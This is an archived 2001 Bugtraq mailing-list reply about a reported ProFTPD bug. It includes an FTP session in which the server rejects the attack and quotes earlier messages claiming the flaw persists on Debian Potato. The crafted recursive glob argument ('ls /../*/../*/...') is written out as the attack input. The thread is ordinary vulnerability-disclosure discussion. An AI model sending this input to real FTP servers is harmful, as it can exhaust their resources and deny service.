[22338] in bugtraq
RE: Multiple-Vendor-FTP-Vuln. (old?)
daemon@ATHENA.MIT.EDU (Michael Bellears)
Mon Aug 20 19:05:11 2001
Message-ID: <C01D5C25A363D411A99200902760F2712C2A94@thematrix.datafx.com.au>
From: Michael Bellears <michael.bellears@staff.datafx.com.au>
To: "'Michael Faurot'" <mfaurot@atww.org>
Cc: bugtraq@securityfocus.com
Date: Tue, 21 Aug 2001 08:43:54 +1000
MIME-Version: 1.0
Content-Type: text/plain;
charset="iso-8859-1"
Couldn't reproduce on Debian 2.2....
isp-server-03:/# proftpd -v
- ProFTPD Version 1.2.0pre10
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> bin
200 Type set to I.
ftp> ls /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*
200 PORT command successful.
550 /../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*/../*:
Forbidden command argument
ftp> quit
221 Goodbye.
Regards,
MB
> -----Original Message-----
> From: Michael Faurot [mailto:mfaurot@atww.org]
> Sent: Tuesday, 21 August 2001 5:20 AM
> To: bugtraq@securityfocus.com
> Subject: Re: Multiple-Vendor-FTP-Vuln. (old?)
>
>
> Enrico Kern <IphantomI@web.de> wrote:
> : Hi,
>
> : i tested an old proftpd bug (ls
> /../*/../*/../*/../*/../*/../*/../*) on =
> : many new Linux-Dist..
>
> This bug appears to still be present with Debian Stable (Potato) which
> uses ProFTPd v1.2.0pre10.
>
> --
> --------------------------------------------------------------
> ----------------
> Michael | mfaurot | Give your child mental blocks for Christmas.
> Faurot | atww.org |
>
